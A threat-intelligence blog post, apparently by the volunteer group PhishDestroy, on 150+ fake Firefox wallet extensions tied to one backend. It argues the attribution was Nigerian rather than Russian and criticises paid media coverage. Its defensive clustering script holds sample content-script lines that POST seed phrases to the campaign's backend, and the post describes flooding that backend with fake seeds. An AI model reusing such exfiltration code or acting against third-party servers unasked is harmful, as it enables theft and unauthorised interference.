Mozilla Fake Extensions Investigation
Investigation • 6–8 min read

150+ Fake Mozilla Extensions — One Backend & Paid Media

Media blamed “Russian bears” for 150+ fake Mozilla extensions. Our findings show Nigerian infrastructure (IP 185.208.156.66), recycled phishing kits, and how paid articles helped spread the myth.

Originally published on Medium — PhishDestroy

The Misleading Narrative

A story about "150+ fake Mozilla extensions" tied to a supposed "Russian trail" was amplified across major crypto and security outlets. It sounds dramatic, but our analysis shows this narrative is misleading — and worse, it shields the real perpetrators.

150+ Low-Quality Extensions on a Single Backend

All extensions in this campaign were:

  • Non-unique, copy-paste quality.
  • Only logos and names varied.
  • All connected to a single backend.

Backend IP: 185.208.156.66

The backend domain was alladdsite[.]digital/app.php. Most domains tied to this IP are now dead, but archives preserved snapshots through Urlscan and WebArchive.
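The kind of triage that surfaces a cluster like this, as an added example rather than PhishDestroy's own tooling: for each extension bundle, pull the hosts its content script posts to, and hash the script with the extension's own branding stripped, so bundles that differ only in name and logo and share one backend group together. The sample bundles and the example-legit-sync.test host are constructed; only the backend domain comes from the write-up.

```python
import re
import hashlib
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed sample bundles (not real extension code). Each holds the manifest
# name and the single content script the bundle ships. Only alladdsite.digital
# is taken from the investigation; the legit-looking host is a placeholder.
SAMPLE_EXTENSIONS = [
    {"name": "MetaWallet Helper", "logo": "meta.png",
     "script": 'fetch("https://alladdsite.digital/app.php",{method:"POST",'
               'body:JSON.stringify({name:"MetaWallet Helper",seed:s})})'},
    {"name": "PhantomSync", "logo": "phantom.png",
     "script": 'fetch("https://alladdsite.digital/app.php",{method:"POST",'
               'body:JSON.stringify({name:"PhantomSync",seed:s})})'},
    {"name": "TrustVault Pro", "logo": "trust.png",
     "script": 'fetch("http://alladdsite.digital/app.php?v=2",{method:"POST",'
               'body:JSON.stringify({name:"TrustVault Pro",seed:s})})'},
    {"name": "Tab Notes", "logo": "notes.png",
     "script": 'fetch("https://example-legit-sync.test/api/notes",{body:n})'},
]

URL_RE = re.compile(r'https?://[^\s"\'\)]+')

def backend_hosts(script):
    """Hosts the script talks to; scheme, path and query are dropped so
    http/https and ?v=2 variants of one backend still match."""
    return {urlsplit(u).hostname.lower() for u in URL_RE.findall(script)}

def skeleton_hash(ext):
    """Fingerprint of the script with the extension's own name blanked out,
    so copy-paste bundles that differ only in branding hash identically."""
    body = ext["script"].replace(ext["name"], "<NAME>")
    return hashlib.sha256(body.encode()).hexdigest()[:16]

def cluster_by_backend(extensions):
    """Map each backend host to the sorted names of extensions calling it."""
    clusters = defaultdict(set)
    for ext in extensions:
        for host in backend_hosts(ext["script"]):
            clusters[host].add(ext["name"])
    return {h: sorted(n) for h, n in clusters.items()}

def shared_backends(extensions, min_extensions=3):
    """Hosts reused by at least min_extensions distinct extensions."""
    return {h: n for h, n in cluster_by_backend(extensions).items()
            if len(n) >= min_extensions}

def cluster_by_skeleton(extensions):
    """Groups of extensions whose scripts are identical apart from the name."""
    groups = defaultdict(list)
    for ext in extensions:
        groups[skeleton_hash(ext)].append(ext["name"])
    return {k: sorted(v) for k, v in groups.items() if len(v) > 1}
```

On the constructed set, three of the four bundles share one backend host and two of them collapse to the same skeleton hash; the fourth, unrelated bundle stays alone on both views.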

Our Actions Against This Campaign

As a volunteer threat intelligence group specializing in phishing and scam infrastructure takedowns, we:

  • Submitted reports directly to Mozilla to flag malicious extensions.
  • Escalated to Seal, requesting professional assistance to accelerate banning.
  • Published a report on Chainabuse for community visibility.
  • Injected millions of empty seed phrases into the attackers' backend to pollute stolen data.

Why This Is Not "Russian" Infrastructure

Russian-speaking threat actors typically use:

  • Distributed backends (Cloudflare Workers, Firebase, Amazon, unique links per campaign).
  • Obfuscation and redundancy to avoid single points of failure.

Instead, this campaign showed:

  • A Nigerian hosting provider.
  • Neighboring domains tied to bank scams, fake crypto wallets, fake delivery scams.
  • A Telegram account receiving stolen data linked to a Nigerian operator.

"Russian groups build sophisticated infrastructures. This was cheap, centralized, and unsophisticated — exactly what we've seen before on Nigerian servers."

The Paid Media Problem

Paid media placements create serious consequences:

  1. One paid article in a respected outlet gets published.
  2. Hundreds of smaller sites, blogs, and Telegram channels rewrite or translate it.
  3. Within days, it becomes a massive fake narrative with the illusion of credibility.

"Victims see 'the Russian trail,' believe the case is closed, and stop reporting to authorities. Real criminals remain untouched."

Example: Angel Drainer

Every major outlet ran headlines about "Angel Drainer shutdown after devs identified." But was it true — or just another paid placement repeated until it looked credible? For criminals, buying articles is pocket change; for victims, it changes everything.

Cybersecurity Companies Buying Their Own PR

Cybersecurity companies pay tens of thousands of dollars for articles about themselves, their research, and their impact. This raises fundamental questions:

  • Why does a real cybersecurity group need to pay for coverage?
  • Are they trying to bury the real hacker's trail?
  • Or leverage the hacker's identity for blackmail or competitive gain?
  • Is the purpose to strengthen trust — or manipulate perception for profit?

"If cybersecurity becomes another PR game, where facts are shaped by who pays more, then trust in this field collapses."

Evidence of the Market

The practice is not hidden:

  • On Fiverr, Upwork, and specialized PR markets, you can directly purchase "guest posts."
  • Providers send Google Sheets with dozens of outlets and prices — including well-known cybersecurity brands.
  • Some promise: "for an extra fee, no sponsored label."

Stated goals for buying articles include:

  • Link Building (SEO).
  • Traffic & Sales.
  • Brand Awareness.
  • Reputation Management (burying negatives).
  • Social Verification.
  • Publication Lists for Visa Applications.

Costs mentioned include over $20,000 for paid interview slots from major crypto media outlets.

"This is not journalism. It is a market — where credibility is bought and sold."

Business vs. Lies

Publishing paid content is not illegal — it's business. But when it crosses into publishing false claims, misdirecting investigations, and disguising PR as fact, it becomes part of the problem.

Conclusion

PhishDestroy is a volunteer cybersecurity initiative that doesn't get paid, sell ads, or profit. The facts are clear:

  • 150+ Mozilla extensions routed to a single backend on Nigerian hosting.
  • Data went to a Nigerian Telegram account.
  • The "Russian trail" narrative is fabricated.
  • Paid media coverage amplified this fabrication until it looked like truth.
  • Even cybersecurity companies themselves pay for self-promotion.

"Selling ads is business. Selling lies as facts shields criminals. And when even cybersecurity sells narratives, the victims — and justice — lose."

Disclaimer

We are not accusing any individual, company, or media outlet. All facts are open-source and verifiable through public archives, scanners, and reports. The real question: why are such narratives controlled and amplified? Who benefits when an unknown security company publishes an inaccurate mega-investigation that shifts attention away from real actors?

#MozillaExtensions #PaidMedia #Disinformation #ThreatIntel #OSINT

Transparency notice. PhishDestroy is a non-commercial, volunteer-driven project. Our research may reflect an inherent bias against scam infrastructure and the services that enable it. We encourage readers to evaluate all material critically and independently.